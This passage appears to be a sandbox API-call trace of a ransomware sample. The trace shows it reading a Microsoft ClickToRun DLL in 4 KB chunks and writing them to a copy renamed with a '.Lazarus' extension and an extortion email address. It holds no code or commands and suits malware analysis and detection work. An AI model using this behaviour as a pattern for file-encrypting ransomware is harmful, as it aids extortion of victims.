MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0098.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0098.134] GetLastError () returned 0x0 [0098.134] SetLastError (dwErrCode=0x0) [0098.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4ddc8 [0098.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0098.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0098.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0098.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0098.135] GetLastError () returned 0x0 [0098.135] SetLastError (dwErrCode=0x0) [0098.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0098.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a3b0 [0098.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0098.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0098.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0098.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0098.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.135] AreFileApisANSI () returned 1 [0098.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 136 [0098.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x8b568 [0098.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x8b568, cchWideChar=136 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 136 [0098.135] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0098.136] GetFileType (hFile=0x368) returned 0x1 [0098.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0098.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0098.136] AreFileApisANSI () returned 1 [0098.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0098.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85ee0 [0098.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll") returned 74 [0098.161] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.161] GetFileType (hFile=0x418) returned 0x1 [0098.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0098.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0098.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0098.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0098.161] GetLastError () returned 0x0 [0098.162] SetLastError (dwErrCode=0x0) [0098.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0098.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0098.162] GetLastError () returned 0x0 [0098.162] SetLastError (dwErrCode=0x0) [0098.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0098.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0098.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0098.162] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0098.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0098.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0098.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x570e0 [0098.183] GetLastError () returned 0x0 [0098.183] SetLastError (dwErrCode=0x0) [0098.183] GetLastError () returned 0x0 [0098.183] SetLastError (dwErrCode=0x0) [0098.183] GetLastError () returned 0x0 [0098.183] SetLastError (dwErrCode=0x0) [0098.184] GetLastError () returned 0x0 [0098.184] SetLastError (dwErrCode=0x0) [0098.184] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.192] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.194] GetLastError () returned 0x0 [0098.194] SetLastError (dwErrCode=0x0) [0098.194] GetLastError () returned 0x0 [0098.194] SetLastError (dwErrCode=0x0) [0098.194] GetLastError () returned 0x0 [0098.194] SetLastError (dwErrCode=0x0) [0098.194] GetLastError () returned 0x0 [0098.194] SetLastError (dwErrCode=0x0) [0098.194] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.195] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.195] GetLastError () returned 0x0 [0098.195] SetLastError (dwErrCode=0x0) [0098.195] GetLastError () returned 0x0 [0098.195] SetLastError (dwErrCode=0x0) [0098.195] GetLastError () returned 0x0 [0098.196] SetLastError (dwErrCode=0x0) [0098.196] GetLastError () returned 0x0 [0098.196] SetLastError (dwErrCode=0x0) [0098.196] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.196] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.196] GetLastError () returned 0x0 [0098.196] SetLastError (dwErrCode=0x0) [0098.197] GetLastError () returned 0x0 [0098.197] SetLastError (dwErrCode=0x0) [0098.197] GetLastError () returned 0x0 [0098.197] SetLastError (dwErrCode=0x0) [0098.197] GetLastError () returned 0x0 [0098.197] SetLastError (dwErrCode=0x0) [0098.198] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.198] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.198] GetLastError () returned 0x0 [0098.198] SetLastError (dwErrCode=0x0) [0098.198] GetLastError () returned 0x0 [0098.198] SetLastError (dwErrCode=0x0) [0098.198] GetLastError () returned 0x0 [0098.198] SetLastError (dwErrCode=0x0) [0098.199] GetLastError () returned 0x0 [0098.199] SetLastError (dwErrCode=0x0) [0098.199] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.199] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.199] GetLastError () returned 0x0 [0098.199] SetLastError (dwErrCode=0x0) [0098.199] GetLastError () returned 0x0 [0098.199] SetLastError (dwErrCode=0x0) [0098.200] GetLastError () returned 0x0 [0098.200] SetLastError (dwErrCode=0x0) [0098.200] GetLastError () returned 0x0 [0098.200] SetLastError (dwErrCode=0x0) [0098.200] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.200] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.201] GetLastError () returned 0x0 [0098.201] SetLastError (dwErrCode=0x0) [0098.201] GetLastError () returned 0x0 [0098.201] SetLastError (dwErrCode=0x0) [0098.201] GetLastError () returned 0x0 [0098.201] SetLastError (dwErrCode=0x0) [0098.201] GetLastError () returned 0x0 [0098.201] SetLastError (dwErrCode=0x0) [0098.201] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.201] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.202] GetLastError () returned 0x0 [0098.202] SetLastError (dwErrCode=0x0) [0098.202] GetLastError () returned 0x0 [0098.202] SetLastError (dwErrCode=0x0) [0098.202] GetLastError () returned 0x0 [0098.202] SetLastError (dwErrCode=0x0) [0098.202] GetLastError () returned 0x0 [0098.202] SetLastError (dwErrCode=0x0) [0098.202] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.203] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.203] GetLastError () returned 0x0 [0098.203] SetLastError (dwErrCode=0x0) [0098.203] GetLastError () returned 0x0 [0098.203] SetLastError (dwErrCode=0x0) [0098.203] GetLastError () returned 0x0 [0098.203] SetLastError (dwErrCode=0x0) [0098.204] GetLastError () returned 0x0 [0098.204] SetLastError (dwErrCode=0x0) [0098.204] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.204] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.204] GetLastError () returned 0x0 [0098.204] SetLastError (dwErrCode=0x0) [0098.205] GetLastError () returned 0x0 [0098.205] SetLastError (dwErrCode=0x0) [0098.205] GetLastError () returned 0x0 [0098.205] SetLastError (dwErrCode=0x0) [0098.205] GetLastError () returned 0x0 [0098.205] SetLastError (dwErrCode=0x0) [0098.205] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.205] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.206] GetLastError () returned 0x0 [0098.206] SetLastError (dwErrCode=0x0) [0098.206] GetLastError () returned 0x0 [0098.206] SetLastError (dwErrCode=0x0) [0098.206] GetLastError () returned 0x0 [0098.206] SetLastError (dwErrCode=0x0) [0098.206] GetLastError () returned 0x0 [0098.206] SetLastError (dwErrCode=0x0) [0098.207] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.207] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.207] GetLastError () returned 0x0 [0098.207] SetLastError (dwErrCode=0x0) [0098.207] GetLastError () returned 0x0 [0098.207] SetLastError (dwErrCode=0x0) [0098.208] GetLastError () returned 0x0 [0098.208] SetLastError (dwErrCode=0x0) [0098.208] GetLastError () returned 0x0 [0098.208] SetLastError (dwErrCode=0x0) [0098.208] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.208] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.208] GetLastError () returned 0x0 [0098.208] SetLastError (dwErrCode=0x0) [0098.209] GetLastError () returned 0x0 [0098.209] SetLastError (dwErrCode=0x0) [0098.209] GetLastError () returned 0x0 [0098.209] SetLastError (dwErrCode=0x0) [0098.209] GetLastError () returned 0x0 [0098.209] SetLastError (dwErrCode=0x0) [0098.209] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.209] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.210] GetLastError () returned 0x0 [0098.210] SetLastError (dwErrCode=0x0) [0098.210] GetLastError () returned 0x0 [0098.210] SetLastError (dwErrCode=0x0) [0098.210] GetLastError () returned 0x0 [0098.210] SetLastError (dwErrCode=0x0) [0098.210] GetLastError () returned 0x0 [0098.210] SetLastError (dwErrCode=0x0) [0098.210] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.211] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.211] GetLastError () returned 0x0 [0098.211] SetLastError (dwErrCode=0x0) [0098.211] GetLastError () returned 0x0 [0098.211] SetLastError (dwErrCode=0x0) [0098.212] GetLastError () returned 0x0 [0098.212] SetLastError (dwErrCode=0x0) [0098.212] GetLastError () returned 0x0 [0098.212] SetLastError (dwErrCode=0x0) [0098.212] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.212] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.212] GetLastError () returned 0x0 [0098.212] SetLastError (dwErrCode=0x0) [0098.213] GetLastError () returned 0x0 [0098.213] SetLastError (dwErrCode=0x0) [0098.213] GetLastError () returned 0x0 [0098.213] SetLastError (dwErrCode=0x0) [0098.213] GetLastError () returned 0x0 [0098.213] SetLastError (dwErrCode=0x0) [0098.213] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.213] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.214] GetLastError () returned 0x0 [0098.214] SetLastError (dwErrCode=0x0) [0098.214] GetLastError () returned 0x0 [0098.214] SetLastError (dwErrCode=0x0) [0098.214] GetLastError () returned 0x0 [0098.214] SetLastError (dwErrCode=0x0) [0098.214] GetLastError () returned 0x0 [0098.214] SetLastError (dwErrCode=0x0) [0098.214] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.215] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.215] GetLastError () returned 0x0 [0098.215] SetLastError (dwErrCode=0x0) [0098.215] GetLastError () returned 0x0 [0098.215] SetLastError (dwErrCode=0x0) [0098.215] GetLastError () returned 0x0 [0098.215] SetLastError (dwErrCode=0x0) [0098.215] GetLastError () returned 0x0 [0098.215] SetLastError (dwErrCode=0x0) [0098.215] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.216] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.216] GetLastError () returned 0x0 [0098.216] SetLastError (dwErrCode=0x0) [0098.216] GetLastError () returned 0x0 [0098.216] SetLastError (dwErrCode=0x0) [0098.216] GetLastError () returned 0x0 [0098.216] SetLastError (dwErrCode=0x0) [0098.217] GetLastError () returned 0x0 [0098.217] SetLastError (dwErrCode=0x0) [0098.217] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.217] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.217] GetLastError () returned 0x0 [0098.217] SetLastError (dwErrCode=0x0) [0098.217] GetLastError () returned 0x0 [0098.217] SetLastError (dwErrCode=0x0) [0098.218] GetLastError () returned 0x0 [0098.218] SetLastError (dwErrCode=0x0) [0098.218] GetLastError () returned 0x0 [0098.218] SetLastError (dwErrCode=0x0) [0098.218] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.218] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.218] GetLastError () returned 0x0 [0098.218] SetLastError (dwErrCode=0x0) [0098.219] GetLastError () returned 0x0 [0098.219] SetLastError (dwErrCode=0x0) [0098.219] GetLastError () returned 0x0 [0098.219] SetLastError (dwErrCode=0x0) [0098.219] GetLastError () returned 0x0 [0098.219] SetLastError (dwErrCode=0x0) [0098.219] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.220] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.220] GetLastError () returned 0x0 [0098.220] SetLastError (dwErrCode=0x0) [0098.220] GetLastError () returned 0x0 [0098.220] SetLastError (dwErrCode=0x0) [0098.220] GetLastError () returned 0x0 [0098.220] SetLastError (dwErrCode=0x0) [0098.220] GetLastError () returned 0x0 [0098.220] SetLastError (dwErrCode=0x0) [0098.221] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.221] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.221] GetLastError () returned 0x0 [0098.221] SetLastError (dwErrCode=0x0) [0098.221] GetLastError () returned 0x0 [0098.221] SetLastError (dwErrCode=0x0) [0098.221] GetLastError () returned 0x0 [0098.221] SetLastError (dwErrCode=0x0) [0098.222] GetLastError () returned 0x0 [0098.222] SetLastError (dwErrCode=0x0) [0098.222] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.222] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.222] GetLastError () returned 0x0 [0098.222] SetLastError (dwErrCode=0x0) [0098.222] GetLastError () returned 0x0 [0098.223] SetLastError (dwErrCode=0x0) [0098.223] GetLastError () returned 0x0 [0098.223] SetLastError (dwErrCode=0x0) [0098.223] GetLastError () returned 0x0 [0098.223] SetLastError (dwErrCode=0x0) [0098.223] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0098.223] WriteFile (in: hFile=0x368, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0098.224] GetLastError () returned 0x0 [0098.224] SetLastError (dwErrCode=0x0) [0098.224] GetLastError () returned 0x0 [0098.224] SetLastError (dwErrCode=0x0) [0098.411] GetLastError () returned 0x0 [0098.411] SetLastError (dwErrCode=0x0) 